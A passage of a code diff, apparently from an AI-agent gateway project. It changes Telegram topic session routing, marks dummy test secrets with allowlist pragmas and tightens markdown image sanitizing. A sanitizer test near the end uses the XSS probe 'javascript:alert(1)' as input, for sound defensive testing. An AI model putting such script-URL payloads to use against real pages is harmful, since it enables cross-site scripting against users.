"./bot-native-commands.test-helpers.js"; // All mocks scoped to this file only — does not affect bot-native-commands.test.ts @@ -24,6 +27,12 @@ const sessionMocks = vi.hoisted(() => ({ const replyMocks = vi.hoisted(() => ({ dispatchReplyWithBufferedBlockDispatcher: vi.fn(async () => undefined), })); +const sessionBindingMocks = vi.hoisted(() => ({ + resolveByConversation: vi.fn< + (ref: unknown) => { bindingId: string; targetSessionKey: string } | null + >(() => null), + touch: vi.fn(), +})); vi.mock("../acp/persistent-bindings.js", async (importOriginal) => { const actual = await importOriginal(); @@ -49,6 +58,16 @@ vi.mock("../auto-reply/reply/provider-dispatcher.js", () => ({ vi.mock("../channels/reply-prefix.js", () => ({ createReplyPrefixOptions: vi.fn(() => ({ onModelSelected: () => {} })), })); +vi.mock("../infra/outbound/session-binding-service.js", () => ({ + getSessionBindingService: () => ({ + bind: vi.fn(), + getCapabilities: vi.fn(), + listBySession: vi.fn(), + resolveByConversation: (ref: unknown) => sessionBindingMocks.resolveByConversation(ref), + touch: (bindingId: string, at?: number) => sessionBindingMocks.touch(bindingId, at), + unbind: vi.fn(), + }), +})); vi.mock("../auto-reply/skill-commands.js", async (importOriginal) => { const actual = await importOriginal(); return { ...actual, listSkillCommandsForAgents: vi.fn(() => []) }; @@ -106,11 +125,12 @@ function registerAndResolveStatusHandler(params: { cfg: OpenClawConfig; allowFrom?: string[]; groupAllowFrom?: string[]; + resolveTelegramGroupConfig?: RegisterTelegramHandlerParams["resolveTelegramGroupConfig"]; }): { handler: TelegramCommandHandler; sendMessage: ReturnType; } { - const { cfg, allowFrom, groupAllowFrom } = params; + const { cfg, allowFrom, groupAllowFrom, resolveTelegramGroupConfig } = params; const commandHandlers = new Map(); const sendMessage = vi.fn().mockResolvedValue(undefined); registerTelegramNativeCommands({ @@ -127,6 +147,7 @@ function registerAndResolveStatusHandler(params: { cfg, allowFrom: allowFrom ?? ["*"], groupAllowFrom: groupAllowFrom ?? [], + resolveTelegramGroupConfig, }), }); @@ -141,11 +162,19 @@ function registerAndResolveCommandHandler(params: { allowFrom?: string[]; groupAllowFrom?: string[]; useAccessGroups?: boolean; + resolveTelegramGroupConfig?: RegisterTelegramHandlerParams["resolveTelegramGroupConfig"]; }): { handler: TelegramCommandHandler; sendMessage: ReturnType; } { - const { commandName, cfg, allowFrom, groupAllowFrom, useAccessGroups } = params; + const { + commandName, + cfg, + allowFrom, + groupAllowFrom, + useAccessGroups, + resolveTelegramGroupConfig, + } = params; const commandHandlers = new Map(); const sendMessage = vi.fn().mockResolvedValue(undefined); registerTelegramNativeCommands({ @@ -163,6 +192,7 @@ function registerAndResolveCommandHandler(params: { allowFrom: allowFrom ?? [], groupAllowFrom: groupAllowFrom ?? [], useAccessGroups: useAccessGroups ?? true, + resolveTelegramGroupConfig, }), }); @@ -183,6 +213,8 @@ describe("registerTelegramNativeCommands — session metadata", () => { sessionMocks.recordSessionMetaFromInbound.mockClear().mockResolvedValue(undefined); sessionMocks.resolveStorePath.mockClear().mockReturnValue("/tmp/openclaw-sessions.json"); replyMocks.dispatchReplyWithBufferedBlockDispatcher.mockClear().mockResolvedValue(undefined); + sessionBindingMocks.resolveByConversation.mockReset().mockReturnValue(null); + sessionBindingMocks.touch.mockReset(); }); it("calls recordSessionMetaFromInbound after a native slash command", async () => { @@ -198,7 +230,7 @@ describe("registerTelegramNativeCommands — session metadata", () => { )[0]?.[0]; expect(call?.ctx?.OriginatingChannel).toBe("telegram"); expect(call?.ctx?.Provider).toBe("telegram"); - expect(call?.sessionKey).toBeDefined(); + expect(call?.sessionKey).toBe("agent:main:telegram:slash:200"); }); it("awaits session metadata persistence before dispatch", async () => { @@ -265,6 +297,64 @@ describe("registerTelegramNativeCommands — session metadata", () => { > )[0]?.[0]; expect(dispatchCall?.ctx?.CommandTargetSessionKey).toBe(boundSessionKey); + const sessionMetaCall = ( + sessionMocks.recordSessionMetaFromInbound.mock.calls as unknown as Array< + [{ sessionKey?: string }] + > + )[0]?.[0]; + expect(sessionMetaCall?.sessionKey).toBe("agent:codex:telegram:slash:200"); + }); + + it("routes Telegram native commands through topic-specific agent sessions", async () => { + const { handler } = registerAndResolveStatusHandler({ + cfg: {}, + allowFrom: ["200"], + groupAllowFrom: ["200"], + resolveTelegramGroupConfig: () => ({ + groupConfig: { requireMention: false }, + topicConfig: { agentId: "zu" }, + }), + }); + await handler(buildStatusTopicCommandContext()); + + const dispatchCall = ( + replyMocks.dispatchReplyWithBufferedBlockDispatcher.mock.calls as unknown as Array< + [{ ctx?: { CommandTargetSessionKey?: string } }] + > + )[0]?.[0]; + expect(dispatchCall?.ctx?.CommandTargetSessionKey).toBe( + "agent:zu:telegram:group:-1001234567890:topic:42", + ); + }); + + it("routes Telegram native commands through bound topic sessions", async () => { + sessionBindingMocks.resolveByConversation.mockReturnValue({ + bindingId: "default:-1001234567890:topic:42", + targetSessionKey: "agent:codex-acp:session-1", + }); + + const { handler } = registerAndResolveStatusHandler({ + cfg: {}, + allowFrom: ["200"], + groupAllowFrom: ["200"], + }); + await handler(buildStatusTopicCommandContext()); + + expect(sessionBindingMocks.resolveByConversation).toHaveBeenCalledWith({ + channel: "telegram", + accountId: "default", + conversationId: "-1001234567890:topic:42", + }); + const dispatchCall = ( + replyMocks.dispatchReplyWithBufferedBlockDispatcher.mock.calls as unknown as Array< + [{ ctx?: { CommandTargetSessionKey?: string } }] + > + )[0]?.[0]; + expect(dispatchCall?.ctx?.CommandTargetSessionKey).toBe("agent:codex-acp:session-1"); + expect(sessionBindingMocks.touch).toHaveBeenCalledWith( + "default:-1001234567890:topic:42", + undefined, + ); }); it("aborts native command dispatch when configured ACP topic binding cannot initialize", async () => { diff --git a/src/telegram/bot-native-commands.test-helpers.ts b/src/telegram/bot-native-commands.test-helpers.ts index 0a749841d76..b79d61d48a3 100644 --- a/src/telegram/bot-native-commands.test-helpers.ts +++ b/src/telegram/bot-native-commands.test-helpers.ts @@ -19,6 +19,7 @@ export function createNativeCommandTestParams(params: { nativeEnabled?: boolean; nativeSkillsEnabled?: boolean; nativeDisabledExplicit?: boolean; + resolveTelegramGroupConfig?: RegisterTelegramNativeCommandParams["resolveTelegramGroupConfig"]; opts?: RegisterTelegramNativeCommandParams["opts"]; }): RegisterTelegramNativeCommandParams { return { @@ -36,10 +37,12 @@ export function createNativeCommandTestParams(params: { nativeSkillsEnabled: params.nativeSkillsEnabled ?? true, nativeDisabledExplicit: params.nativeDisabledExplicit ?? false, resolveGroupPolicy: () => ({ allowlistEnabled: false, allowed: true }), - resolveTelegramGroupConfig: () => ({ - groupConfig: undefined, - topicConfig: undefined, - }), + resolveTelegramGroupConfig: + params.resolveTelegramGroupConfig ?? + (() => ({ + groupConfig: undefined, + topicConfig: undefined, + })), shouldSkipUpdate: () => false, opts: params.opts ?? { token: "token" }, }; diff --git a/src/telegram/bot-native-commands.ts b/src/telegram/bot-native-commands.ts index 115180c8c4c..cc00a46dd8a 100644 --- a/src/telegram/bot-native-commands.ts +++ b/src/telegram/bot-native-commands.ts @@ -1,8 +1,5 @@ import type { Bot, Context } from "grammy"; -import { - ensureConfiguredAcpRouteReady, - resolveConfiguredAcpRoute, -} from "../acp/persistent-bindings.route.js"; +import { ensureConfiguredAcpRouteReady } from "../acp/persistent-bindings.route.js"; import { resolveChunkMode } from "../auto-reply/chunk.js"; import type { CommandArgs } from "../auto-reply/commands-registry.js"; import { @@ -60,12 +57,11 @@ import { buildTelegramThreadParams, buildSenderName, buildTelegramGroupFrom, - buildTelegramGroupPeerId, - buildTelegramParentPeer, resolveTelegramGroupAllowFromContext, resolveTelegramThreadSpec, } from "./bot/helpers.js"; import type { TelegramContext } from "./bot/types.js"; +import { resolveTelegramConversationRoute } from "./conversation-route.js"; import { evaluateTelegramGroupBaseAccess, evaluateTelegramGroupPolicyAccess, @@ -424,15 +420,17 @@ export const registerTelegramNativeCommands = ({ isGroup: boolean; isForum: boolean; resolvedThreadId?: number; + senderId?: string; + topicAgentId?: string; }): Promise<{ chatId: number; threadSpec: ReturnType; - route: ReturnType; + route: ReturnType["route"]; mediaLocalRoots: readonly string[] | undefined; tableMode: ReturnType; chunkMode: ReturnType; } | null> => { - const { msg, isGroup, isForum, resolvedThreadId } = params; + const { msg, isGroup, isForum, resolvedThreadId, senderId, topicAgentId } = params; const chatId = msg.chat.id; const messageThreadId = (msg as { message_thread_id?: number }).message_thread_id; const threadSpec = resolveTelegramThreadSpec({ @@ -440,28 +438,16 @@ export const registerTelegramNativeCommands = ({ isForum, messageThreadId, }); - const parentPeer = buildTelegramParentPeer({ isGroup, resolvedThreadId, chatId }); - const peerId = isGroup ? buildTelegramGroupPeerId(chatId, resolvedThreadId) : String(chatId); - let route = resolveAgentRoute({ + let { route, configuredBinding } = resolveTelegramConversationRoute({ cfg, - channel: "telegram", accountId, - peer: { - kind: isGroup ? "group" : "direct", - id: peerId, - }, - parentPeer, + chatId, + isGroup, + resolvedThreadId, + replyThreadId: threadSpec.id, + senderId, + topicAgentId, }); - const configuredRoute = resolveConfiguredAcpRoute({ - cfg, - route, - channel: "telegram", - accountId, - conversationId: peerId, - parentConversationId: isGroup ? String(chatId) : undefined, - }); - const configuredBinding = configuredRoute.configuredBinding; - route = configuredRoute.route; if (configuredBinding) { const ensured = await ensureConfiguredAcpRouteReady({ cfg, @@ -562,6 +548,8 @@ export const registerTelegramNativeCommands = ({ isGroup, isForum, resolvedThreadId, + senderId, + topicAgentId: topicConfig?.agentId, }); if (!runtimeContext) { return; @@ -669,7 +657,7 @@ export const registerTelegramNativeCommands = ({ WasMentioned: true, CommandAuthorized: commandAuthorized, CommandSource: "native" as const, - SessionKey: `telegram:slash:${senderId || chatId}`, + SessionKey: `agent:${route.agentId}:telegram:slash:${senderId || chatId}`, AccountId: route.accountId, CommandTargetSessionKey: sessionKey, MessageThreadId: threadSpec.id, @@ -788,6 +776,8 @@ export const registerTelegramNativeCommands = ({ isGroup, isForum, resolvedThreadId, + senderId, + topicAgentId: auth.topicConfig?.agentId, }); if (!runtimeContext) { return; diff --git a/src/telegram/conversation-route.ts b/src/telegram/conversation-route.ts new file mode 100644 index 00000000000..478e9049f7a --- /dev/null +++ b/src/telegram/conversation-route.ts @@ -0,0 +1,122 @@ +import { resolveConfiguredAcpRoute } from "../acp/persistent-bindings.route.js"; +import type { OpenClawConfig } from "../config/config.js"; +import { logVerbose } from "../globals.js"; +import { getSessionBindingService } from "../infra/outbound/session-binding-service.js"; +import { + buildAgentSessionKey, + pickFirstExistingAgentId, + resolveAgentRoute, +} from "../routing/resolve-route.js"; +import { buildAgentMainSessionKey, resolveAgentIdFromSessionKey } from "../routing/session-key.js"; +import { + buildTelegramGroupPeerId, + buildTelegramParentPeer, + resolveTelegramDirectPeerId, +} from "./bot/helpers.js"; + +export function resolveTelegramConversationRoute(params: { + cfg: OpenClawConfig; + accountId: string; + chatId: number | string; + isGroup: boolean; + resolvedThreadId?: number; + replyThreadId?: number; + senderId?: string | number | null; + topicAgentId?: string | null; +}): { + route: ReturnType; + configuredBinding: ReturnType["configuredBinding"]; + configuredBindingSessionKey: string; +} { + const peerId = params.isGroup + ? buildTelegramGroupPeerId(params.chatId, params.resolvedThreadId) + : resolveTelegramDirectPeerId({ + chatId: params.chatId, + senderId: params.senderId, + }); + const parentPeer = buildTelegramParentPeer({ + isGroup: params.isGroup, + resolvedThreadId: params.resolvedThreadId, + chatId: params.chatId, + }); + let route = resolveAgentRoute({ + cfg: params.cfg, + channel: "telegram", + accountId: params.accountId, + peer: { + kind: params.isGroup ? "group" : "direct", + id: peerId, + }, + parentPeer, + }); + + const rawTopicAgentId = params.topicAgentId?.trim(); + if (rawTopicAgentId) { + const topicAgentId = pickFirstExistingAgentId(params.cfg, rawTopicAgentId); + route = { + ...route, + agentId: topicAgentId, + sessionKey: buildAgentSessionKey({ + agentId: topicAgentId, + channel: "telegram", + accountId: params.accountId, + peer: { kind: params.isGroup ? "group" : "direct", id: peerId }, + dmScope: params.cfg.session?.dmScope, + identityLinks: params.cfg.session?.identityLinks, + }).toLowerCase(), + mainSessionKey: buildAgentMainSessionKey({ + agentId: topicAgentId, + }).toLowerCase(), + }; + logVerbose( + `telegram: topic route override: topic=${params.resolvedThreadId ?? params.replyThreadId} agent=${topicAgentId} sessionKey=${route.sessionKey}`, + ); + } + + const configuredRoute = resolveConfiguredAcpRoute({ + cfg: params.cfg, + route, + channel: "telegram", + accountId: params.accountId, + conversationId: peerId, + parentConversationId: params.isGroup ? String(params.chatId) : undefined, + }); + let configuredBinding = configuredRoute.configuredBinding; + let configuredBindingSessionKey = configuredRoute.boundSessionKey ?? ""; + route = configuredRoute.route; + + const threadBindingConversationId = + params.replyThreadId != null + ? `${params.chatId}:topic:${params.replyThreadId}` + : !params.isGroup + ? String(params.chatId) + : undefined; + if (threadBindingConversationId) { + const threadBinding = getSessionBindingService().resolveByConversation({ + channel: "telegram", + accountId: params.accountId, + conversationId: threadBindingConversationId, + }); + const boundSessionKey = threadBinding?.targetSessionKey?.trim(); + if (threadBinding && boundSessionKey) { + route = { + ...route, + sessionKey: boundSessionKey, + agentId: resolveAgentIdFromSessionKey(boundSessionKey), + matchedBy: "binding.channel", + }; + configuredBinding = null; + configuredBindingSessionKey = ""; + getSessionBindingService().touch(threadBinding.bindingId); + logVerbose( + `telegram: routed via bound conversation ${threadBindingConversationId} -> ${boundSessionKey}`, + ); + } + } + + return { + route, + configuredBinding, + configuredBindingSessionKey, + }; +} diff --git a/src/test-utils/imessage-test-plugin.ts b/src/test-utils/imessage-test-plugin.ts index 104d8ca847f..5a072141644 100644 --- a/src/test-utils/imessage-test-plugin.ts +++ b/src/test-utils/imessage-test-plugin.ts @@ -1,6 +1,7 @@ import { imessageOutbound } from "../channels/plugins/outbound/imessage.js"; import type { ChannelOutboundAdapter, ChannelPlugin } from "../channels/plugins/types.js"; import { normalizeIMessageHandle } from "../imessage/targets.js"; +import { collectStatusIssuesFromLastError } from "../plugin-sdk/status-helpers.js"; export const createIMessageTestPlugin = (params?: { outbound?: ChannelOutboundAdapter; @@ -20,21 +21,7 @@ export const createIMessageTestPlugin = (params?: { resolveAccount: () => ({}), }, status: { - collectStatusIssues: (accounts) => - accounts.flatMap((account) => { - const lastError = typeof account.lastError === "string" ? account.lastError.trim() : ""; - if (!lastError) { - return []; - } - return [ - { - channel: "imessage", - accountId: account.accountId, - kind: "runtime", - message: `Channel error: ${lastError}`, - }, - ]; - }), + collectStatusIssues: (accounts) => collectStatusIssuesFromLastError("imessage", accounts), }, outbound: params?.outbound ?? imessageOutbound, messaging: { diff --git a/src/test-utils/model-fallback.mock.ts b/src/test-utils/model-fallback.mock.ts index 21053e2466e..4431db3db96 100644 --- a/src/test-utils/model-fallback.mock.ts +++ b/src/test-utils/model-fallback.mock.ts @@ -4,7 +4,7 @@ export async function runWithModelFallback(params: { run: ( provider: string, model: string, - options?: { allowRateLimitCooldownProbe?: boolean }, + options?: { allowTransientCooldownProbe?: boolean }, ) => Promise; }) { return { diff --git a/src/tui/gateway-chat.test.ts b/src/tui/gateway-chat.test.ts index 58d5433f07f..2113abc7eb5 100644 --- a/src/tui/gateway-chat.test.ts +++ b/src/tui/gateway-chat.test.ts @@ -118,7 +118,7 @@ describe("resolveGatewayConnection", () => { gateway: { mode: "local", auth: { - password: "config-password", + password: "config-password", // pragma: allowlist secret }, }, }); @@ -134,7 +134,7 @@ describe("resolveGatewayConnection", () => { mode: "local", auth: { token: "config-token", - password: "config-password", + password: "config-password", // pragma: allowlist secret }, }, }); @@ -180,13 +180,15 @@ describe("resolveGatewayConnection", () => { loadConfig.mockReturnValue({ gateway: { mode: "remote", - remote: { url: "wss://remote.example/ws", token: "remote-token", password: "remote-pass" }, + remote: { url: "wss://remote.example/ws", token: "remote-token", password: "remote-pass" }, // pragma: allowlist secret }, }); - await withEnvAsync({ OPENCLAW_GATEWAY_PASSWORD: "env-pass" }, async () => { + const gatewayPasswordEnv = "OPENCLAW_GATEWAY_PASSWORD"; // pragma: allowlist secret + const gatewayPassword = "env-pass"; // pragma: allowlist secret + await withEnvAsync({ [gatewayPasswordEnv]: gatewayPassword }, async () => { const result = await resolveGatewayConnection({}); - expect(result.password).toBe("env-pass"); + expect(result.password).toBe(gatewayPassword); }); }); @@ -263,12 +265,12 @@ describe("resolveGatewayConnection", () => { const tokenExecProgram = [ "const fs=require('node:fs');", `fs.writeFileSync(${JSON.stringify(tokenMarker)},'1');`, - "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { TOKEN_SECRET: 'token-from-exec' } }));", + "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { TOKEN_SECRET: 'token-from-exec' } }));", // pragma: allowlist secret ].join(""); const passwordExecProgram = [ "const fs=require('node:fs');", `fs.writeFileSync(${JSON.stringify(passwordMarker)},'1');`, - "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { PASSWORD_SECRET: 'password-from-exec' } }));", + "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { PASSWORD_SECRET: 'password-from-exec' } }));", // pragma: allowlist secret ].join(""); loadConfig.mockReturnValue({ @@ -316,12 +318,12 @@ describe("resolveGatewayConnection", () => { const tokenExecProgram = [ "const fs=require('node:fs');", `fs.writeFileSync(${JSON.stringify(tokenMarker)},'1');`, - "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { TOKEN_SECRET: 'token-from-exec' } }));", + "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { TOKEN_SECRET: 'token-from-exec' } }));", // pragma: allowlist secret ].join(""); const passwordExecProgram = [ "const fs=require('node:fs');", `fs.writeFileSync(${JSON.stringify(passwordMarker)},'1');`, - "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { PASSWORD_SECRET: 'password-from-exec' } }));", + "process.stdout.write(JSON.stringify({ protocolVersion: 1, values: { PASSWORD_SECRET: 'password-from-exec' } }));", // pragma: allowlist secret ].join(""); loadConfig.mockReturnValue({ diff --git a/src/tui/tui-formatters.test.ts b/src/tui/tui-formatters.test.ts index c4dfa26bb14..3ceb0c56570 100644 --- a/src/tui/tui-formatters.test.ts +++ b/src/tui/tui-formatters.test.ts @@ -250,14 +250,14 @@ describe("sanitizeRenderableText", () => { }); it("preserves long credential-like mixed alnum tokens for copy safety", () => { - const input = "e3b19c3b87bcf364b23eebb2c276e96ec478956ba1d84c93"; + const input = "e3b19c3b87bcf364b23eebb2c276e96ec478956ba1d84c93"; // pragma: allowlist secret const sanitized = sanitizeRenderableText(input); expect(sanitized).toBe(input); }); it("preserves quoted credential-like mixed alnum tokens for copy safety", () => { - const input = "'e3b19c3b87bcf364b23eebb2c276e96ec478956ba1d84c93'"; + const input = "'e3b19c3b87bcf364b23eebb2c276e96ec478956ba1d84c93'"; // pragma: allowlist secret const sanitized = sanitizeRenderableText(input); expect(sanitized).toBe(input); diff --git a/src/utils/mask-api-key.test.ts b/src/utils/mask-api-key.test.ts index 3620dc01b34..023576a4eeb 100644 --- a/src/utils/mask-api-key.test.ts +++ b/src/utils/mask-api-key.test.ts @@ -15,6 +15,6 @@ describe("maskApiKey", () => { }); it("masks long values with first and last 8 chars", () => { - expect(maskApiKey("1234567890abcdefghijklmnop")).toBe("12345678...ijklmnop"); + expect(maskApiKey("1234567890abcdefghijklmnop")).toBe("12345678...ijklmnop"); // pragma: allowlist secret }); }); diff --git a/src/web/auto-reply/monitor.ts b/src/web/auto-reply/monitor.ts index 66b9c0fd993..a9ef2f4b229 100644 --- a/src/web/auto-reply/monitor.ts +++ b/src/web/auto-reply/monitor.ts @@ -5,6 +5,7 @@ import { DEFAULT_GROUP_HISTORY_LIMIT } from "../../auto-reply/reply/history.js"; import { formatCliCommand } from "../../cli/command-format.js"; import { waitForever } from "../../cli/wait.js"; import { loadConfig } from "../../config/config.js"; +import { createConnectedChannelStatusPatch } from "../../gateway/channel-status-patches.js"; import { logVerbose } from "../../globals.js"; import { formatDurationPrecise } from "../../infra/format-time/format-duration.ts"; import { enqueueSystemEvent } from "../../infra/system-events.js"; @@ -210,9 +211,7 @@ export async function monitorWebChannel( }, }); - status.connected = true; - status.lastConnectedAt = Date.now(); - status.lastEventAt = status.lastConnectedAt; + Object.assign(status, createConnectedChannelStatusPatch()); status.lastError = null; emitStatus(); diff --git a/src/web/media.test.ts b/src/web/media.test.ts index d91ed4b7d66..9db06e3024a 100644 --- a/src/web/media.test.ts +++ b/src/web/media.test.ts @@ -16,6 +16,17 @@ import { optimizeImageToJpeg, } from "./media.js"; +const convertHeicToJpegMock = vi.fn(); + +vi.mock("../media/image-ops.js", async () => { + const actual = + await vi.importActual("../media/image-ops.js"); + return { + ...actual, + convertHeicToJpeg: (...args: unknown[]) => convertHeicToJpegMock(...args), + }; +}); + let fixtureRoot = ""; let fixtureFileCount = 0; let largeJpegBuffer: Buffer; @@ -23,6 +34,7 @@ let largeJpegFile = ""; let tinyPngBuffer: Buffer; let tinyPngFile = ""; let tinyPngWrongExtFile = ""; +let fakeHeicFile = ""; let alphaPngBuffer: Buffer; let alphaPngFile = ""; let fallbackPngBuffer: Buffer; @@ -76,6 +88,7 @@ beforeAll(async () => { .toBuffer(); tinyPngFile = await writeTempFile(tinyPngBuffer, ".png"); tinyPngWrongExtFile = await writeTempFile(tinyPngBuffer, ".bin"); + fakeHeicFile = await writeTempFile(Buffer.from("fake-heic"), ".heic"); alphaPngBuffer = await sharp({ create: { width: 64, @@ -178,6 +191,22 @@ describe("web media loading", () => { expect(result.contentType).toBe("image/jpeg"); }); + it("normalizes HEIC local files to JPEG output", async () => { + convertHeicToJpegMock.mockResolvedValueOnce(tinyPngBuffer); + + const result = await loadWebMedia(fakeHeicFile, 1024 * 1024); + + expect(convertHeicToJpegMock).toHaveBeenCalledTimes(1); + expect(result.kind).toBe("image"); + expect(result.contentType).toBe("image/jpeg"); + expect(result.fileName).toBe(path.basename(fakeHeicFile, ".heic") + ".jpg"); + expect(result.buffer.length).toBeGreaterThan(0); + expect(result.buffer.equals(tinyPngBuffer)).toBe(false); + // Confirm the output is actually JPEG (magic bytes 0xFF 0xD8) + expect(result.buffer[0]).toBe(0xff); + expect(result.buffer[1]).toBe(0xd8); + }); + it("includes URL + status in fetch errors", async () => { const fetchMock = vi.spyOn(globalThis, "fetch").mockResolvedValueOnce({ ok: false, diff --git a/src/wizard/onboarding.finalize.test.ts b/src/wizard/onboarding.finalize.test.ts index ea7f6ce23bd..8d720c2f594 100644 --- a/src/wizard/onboarding.finalize.test.ts +++ b/src/wizard/onboarding.finalize.test.ts @@ -113,7 +113,7 @@ describe("finalizeOnboardingWizard", () => { it("resolves gateway password SecretRef for probe and TUI", async () => { const previous = process.env.OPENCLAW_GATEWAY_PASSWORD; - process.env.OPENCLAW_GATEWAY_PASSWORD = "resolved-gateway-password"; + process.env.OPENCLAW_GATEWAY_PASSWORD = "resolved-gateway-password"; // pragma: allowlist secret const select = vi.fn(async (params: { message: string }) => { if (params.message === "How do you want to hatch your bot?") { return "tui"; @@ -179,13 +179,13 @@ describe("finalizeOnboardingWizard", () => { expect(probeGatewayReachable).toHaveBeenCalledWith( expect.objectContaining({ url: "ws://127.0.0.1:18789", - password: "resolved-gateway-password", + password: "resolved-gateway-password", // pragma: allowlist secret }), ); expect(runTui).toHaveBeenCalledWith( expect.objectContaining({ url: "ws://127.0.0.1:18789", - password: "resolved-gateway-password", + password: "resolved-gateway-password", // pragma: allowlist secret }), ); }); diff --git a/src/wizard/onboarding.gateway-config.ts b/src/wizard/onboarding.gateway-config.ts index a1f5dfee624..c6d9111c3e4 100644 --- a/src/wizard/onboarding.gateway-config.ts +++ b/src/wizard/onboarding.gateway-config.ts @@ -165,7 +165,7 @@ export async function configureGatewayForOnboarding( defaults: nextConfig.secrets?.defaults, }).ref; const tokenMode = - flow === "quickstart" && opts.secretInputMode !== "ref" + flow === "quickstart" && opts.secretInputMode !== "ref" // pragma: allowlist secret ? quickstartTokenRef ? "ref" : "plaintext" diff --git a/ui/package.json b/ui/package.json index d7e38d939f4..b1f548f2869 100644 --- a/ui/package.json +++ b/ui/package.json @@ -14,7 +14,7 @@ "@noble/ed25519": "3.0.0", "dompurify": "^3.3.2", "lit": "^3.3.2", - "marked": "^17.0.3", + "marked": "^17.0.4", "signal-polyfill": "^0.2.2", "signal-utils": "^0.21.1", "vite": "7.3.1" diff --git a/ui/src/i18n/locales/de.ts b/ui/src/i18n/locales/de.ts index 633bdeb12d8..f45ffc3f4c0 100644 --- a/ui/src/i18n/locales/de.ts +++ b/ui/src/i18n/locales/de.ts @@ -58,7 +58,7 @@ export const de: TranslationMap = { subtitle: "Wo sich das Dashboard verbindet und wie es sich authentifiziert.", wsUrl: "WebSocket-URL", token: "Gateway-Token", - password: "Passwort (nicht gespeichert)", + password: "Passwort (nicht gespeichert)", // pragma: allowlist secret sessionKey: "Standard-Sitzungsschlüssel", language: "Sprache", connectHint: "Klicken Sie auf Verbinden, um Verbindungsänderungen anzuwenden.", diff --git a/ui/src/i18n/locales/es.ts b/ui/src/i18n/locales/es.ts index 0a77e447a0f..a96ee7ad2d7 100644 --- a/ui/src/i18n/locales/es.ts +++ b/ui/src/i18n/locales/es.ts @@ -58,7 +58,7 @@ export const es: TranslationMap = { subtitle: "Dónde se conecta el panel y cómo se autentica.", wsUrl: "URL de WebSocket", token: "Token de la puerta de enlace", - password: "Contraseña (no se guarda)", + password: "Contraseña (no se guarda)", // pragma: allowlist secret sessionKey: "Clave de sesión predeterminada", language: "Idioma", connectHint: "Haz clic en Conectar para aplicar los cambios de conexión.", diff --git a/ui/src/ui/app-gateway.node.test.ts b/ui/src/ui/app-gateway.node.test.ts index 6915a30f999..f5ce210906c 100644 --- a/ui/src/ui/app-gateway.node.test.ts +++ b/ui/src/ui/app-gateway.node.test.ts @@ -237,37 +237,37 @@ describe("resolveControlUiClientVersion", () => { expect( resolveControlUiClientVersion({ gatewayUrl: "ws://localhost:8787", - serverVersion: "2026.3.3", + serverVersion: "2026.3.7", pageUrl: "http://localhost:8787/openclaw/", }), - ).toBe("2026.3.3"); + ).toBe("2026.3.7"); }); it("returns serverVersion for same-origin relative targets", () => { expect( resolveControlUiClientVersion({ gatewayUrl: "/ws", - serverVersion: "2026.3.3", + serverVersion: "2026.3.7", pageUrl: "https://control.example.com/openclaw/", }), - ).toBe("2026.3.3"); + ).toBe("2026.3.7"); }); it("returns serverVersion for same-origin http targets", () => { expect( resolveControlUiClientVersion({ gatewayUrl: "https://control.example.com/ws", - serverVersion: "2026.3.3", + serverVersion: "2026.3.7", pageUrl: "https://control.example.com/openclaw/", }), - ).toBe("2026.3.3"); + ).toBe("2026.3.7"); }); it("omits serverVersion for cross-origin targets", () => { expect( resolveControlUiClientVersion({ gatewayUrl: "wss://gateway.example.com", - serverVersion: "2026.3.3", + serverVersion: "2026.3.7", pageUrl: "https://control.example.com/openclaw/", }), ).toBeUndefined(); diff --git a/ui/src/ui/controllers/control-ui-bootstrap.test.ts b/ui/src/ui/controllers/control-ui-bootstrap.test.ts index fbe0750ac27..33460c3cb9d 100644 --- a/ui/src/ui/controllers/control-ui-bootstrap.test.ts +++ b/ui/src/ui/controllers/control-ui-bootstrap.test.ts @@ -13,7 +13,7 @@ describe("loadControlUiBootstrapConfig", () => { assistantName: "Ops", assistantAvatar: "O", assistantAgentId: "main", - serverVersion: "2026.3.2", + serverVersion: "2026.3.7", }), }); vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); @@ -35,7 +35,7 @@ describe("loadControlUiBootstrapConfig", () => { expect(state.assistantName).toBe("Ops"); expect(state.assistantAvatar).toBe("O"); expect(state.assistantAgentId).toBe("main"); - expect(state.serverVersion).toBe("2026.3.2"); + expect(state.serverVersion).toBe("2026.3.7"); vi.unstubAllGlobals(); }); diff --git a/ui/src/ui/markdown.test.ts b/ui/src/ui/markdown.test.ts index e355ff922a4..279cb2b53fb 100644 --- a/ui/src/ui/markdown.test.ts +++ b/ui/src/ui/markdown.test.ts @@ -30,11 +30,10 @@ describe("toSanitizedMarkdownHtml", () => { expect(html).toContain("console.log(1)"); }); - it("preserves img tags with src and alt from markdown images (#15437)", () => { + it("flattens remote markdown images into alt text", () => { const html = toSanitizedMarkdownHtml("![Alt text](https://example.com/image.png)"); - expect(html).toContain(" { @@ -43,11 +42,17 @@ describe("toSanitizedMarkdownHtml", () => { expect(html).toContain("data:image/png;base64,"); }); - it("strips javascript image urls", () => { + it("flattens non-data markdown image urls", () => { const html = toSanitizedMarkdownHtml("![X](javascript:alert(1))"); - expect(html).toContain(" { + const html = toSanitizedMarkdownHtml("![](https://example.com/image.png)"); + expect(html).not.toContain(" { diff --git a/ui/src/ui/markdown.ts b/ui/src/ui/markdown.ts index 354d4765265..f98ef017351 100644 --- a/ui/src/ui/markdown.ts +++ b/ui/src/ui/markdown.ts @@ -43,6 +43,7 @@ const MARKDOWN_CHAR_LIMIT = 140_000; const MARKDOWN_PARSE_LIMIT = 40_000; const MARKDOWN_CACHE_LIMIT = 200; const MARKDOWN_CACHE_MAX_CHARS = 50_000; +const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i; const markdownCache = new Map(); function getCachedMarkdown(key: string): string | null { @@ -137,6 +138,19 @@ export function toSanitizedMarkdownHtml(markdown: string): string { // pages) as formatted output is confusing UX (#13937). const htmlEscapeRenderer = new marked.Renderer(); htmlEscapeRenderer.html = ({ text }: { text: string }) => escapeHtml(text); +htmlEscapeRenderer.image = (token: { href?: string | null; text?: string | null }) => { + const label = normalizeMarkdownImageLabel(token.text); + const href = token.href?.trim() ?? ""; + if (!INLINE_DATA_IMAGE_RE.test(href)) { + return escapeHtml(label); + } + return `${escapeHtml(label)}`; +}; + +function normalizeMarkdownImageLabel(text?: string | 